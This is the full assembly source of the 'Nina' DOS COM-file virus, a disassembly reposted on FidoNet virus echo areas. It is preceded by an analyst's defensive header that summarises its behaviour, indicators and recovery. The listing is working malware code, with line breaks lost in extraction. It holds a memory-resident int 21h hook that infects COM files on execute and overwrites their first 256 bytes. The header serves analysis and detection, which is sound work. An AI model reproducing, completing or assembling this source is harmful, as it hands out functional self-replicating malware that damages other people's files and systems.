;-----------------------------------------------------------------------
; Analyst notes (review annotation; the listing below is unchanged)
;
; What this is: a 16-bit DOS listing (.model tiny, org 100h) that its
; own comments credit as a disassembly by Dark Angel of Phalcon/Skism
; for 40Hex Number 9, reposted through FidoNet echo mail. It is a
; memory-resident infector of COM files whose body carries the ASCII
; string 'Nina'. The line structure was lost in extraction and is left
; as found, so the text is kept here as a reading reference only.
;
; Behaviour, as the listing shows it:
;  - start: issues int 21h with AX=9753h as a residency probe. An
;    installed copy answers in int21 / exit_install by discarding the
;    interrupt frame and jumping to return_COM, which copies 100h bytes
;    back to offset 100h and far-returns there (the host program).
;  - Install: shrinks the host's memory block by 40h paragraphs
;    (AH=4Ah), allocates 3Fh paragraphs (AH=48h), copies 100h bytes of
;    itself into that block and writes 0AAh to cs:[0F2h]; the listing's
;    own comment gives the purpose as changing the MCB owner so the
;    block is not freed when the host terminates.
;  - Hooks: saves the int 21h vector in oldint21, installs that same
;    address as int 91h (AX=2591h), then points int 21h at int21.
;  - Trigger: apart from the probe value, only AX=4B00h (execute)
;    reaches infect; every other call is chained to oldint21.
;  - infect: opens the file read/write through int 91h, reads 100h
;    bytes into endvirus, and skips the file when the first word is
;    'MZ' or 'ZM', when the word at offset 2 is 9753h, or when the
;    size in AX is above 0FEB0h or below 1F4h. Otherwise it stores the
;    size in endfile, appends the saved 100h bytes at end of file and
;    overwrites the first 100h bytes from offset 100h of its segment.
;
; Indicators a defender can derive from the above:
;  - On disk: a COM file whose bytes at offsets 2-3 are 53h 97h. This
;    appears to be the immediate of the opening `mov ax,9753h`, which
;    is also the value the infection check compares against.
;  - On disk: the string 'Nina' placed directly before endvirus, and a
;    file that is 100h bytes longer than the original.
;  - In memory: int 91h holding the address that int 21h had before
;    installation, and int 21h pointing into a 3Fh-paragraph block.
;  - Recovery, in principle: the host's original first 100h bytes are
;    the 100h bytes appended at the old end of file, and the endfile
;    word inside the body records the original length. Verify on a
;    copy before relying on this.
;-----------------------------------------------------------------------
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 35 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : NINA.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Daniel Hendry, 2:283/718 (06 Nov 94 17:37) ;* To : Viral Doctor ;* Subj : NINA.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org .model tiny .code org 100h ; Disassembly done by Dark Angel of Phalcon/Skism ; for 40Hex Number 9, Volume 2 Issue 5 start: push ax mov ax,9753h ; installation check int 21h mov ax,ds dec ax mov ds,ax ; ds->program MCB mov ax,ds:[3] ; get size word push bx push es sub ax,40h ; reserve 40h paragraphs mov bx,ax mov ah,4Ah ; Shrink memory allocation int 21h mov ah,48h ; Allocate 3Fh paragraphs mov bx,3Fh ; for the virus int 21h mov es,ax ; copy virus to high xor di,di ; memory mov si,offset start + 10h ; start at MCB:110h mov cx,100h ; (same as PSP:100h) rep movsb sub ax,10h ; adjust offset as if it push ax ; originated at 100h mov ax,offset highentry push ax retf endfile dw 100h ; size of infected COM file highentry: mov byte ptr cs:[0F2h],0AAh ; change MCB's owner so the ; memory isn't freed when the ; program terminates mov ax,3521h ; get int 21h vector int 21h mov word ptr cs:oldint21,bx ; save it mov word ptr cs:oldint21+2,es push es pop ds mov dx,bx mov ax,2591h ; redirect int 91h to int 21h int 21h push cs pop ds mov dx,offset int21 mov al,21h ; set int 21h to virus vector int 21h pop ds ; ds->original program PSP pop bx push ds pop es return_COM: mov di,100h ; 
restore original mov si,endfile ; file add si,di ; adjust for COM starting mov cx,100h ; offset rep movsb pop ax push ds ; jmp back to original mov bp,100h ; file (PSP:100) push bp retf exit_install: pop ax ; pop CS:IP and flags in pop ax ; order to balance the pop ax ; stack and then exit the jmp short return_COM ; infected COM file int21: cmp ax,9753h ; installation check? je exit_install cmp ax,4B00h ; execute? jne exitint21 ; nope, quit push ax ; save registers push bx push cx push dx push ds call infect pop ds ; restore registers pop dx pop cx pop bx pop ax exitint21: db 0eah ; jmp far ptr oldint21 dd ? infect: mov ax,3D02h ; open file read/write int 91h jc exit_infect mov bx,ax mov cx,100h push cs pop ds mov ah,3Fh ; Read first 100h bytes mov dx,offset endvirus int 91h mov ax,word ptr endvirus cmp ax,'MZ' ; exit if EXE je close_exit_infect cmp ax,'ZM' ; exit if EXE je close_exit_infect cmp word ptr endvirus+2,9753h ; exit if already je close_exit_infect ; infected mov al,2 ; go to end of file call move_file_pointer cmp ax,0FEB0h ; exit if too large ja close_exit_infect cmp ax,1F4h ; or too small for jb close_exit_infect ; infection mov endfile,ax ; save file size call write mov al,0 ; go to start of file call move_file_pointer mov dx,100h ; write virus call write close_exit_infect: mov ah,3Eh ; Close file int 91h exit_infect: retn move_file_pointer: push dx xor cx,cx xor dx,dx mov ah,42h int 91h pop dx retn write: mov ah,40h mov cx,100h int 91h retn db 'Nina' endvirus: int 20h ; original COM file end start ;-+- Terminate 1.50/Pro ; + Origin: Rampton Birds' Box, +358-31-3564751, 28.800bps, 24h (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/yx Extended memory swapping ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)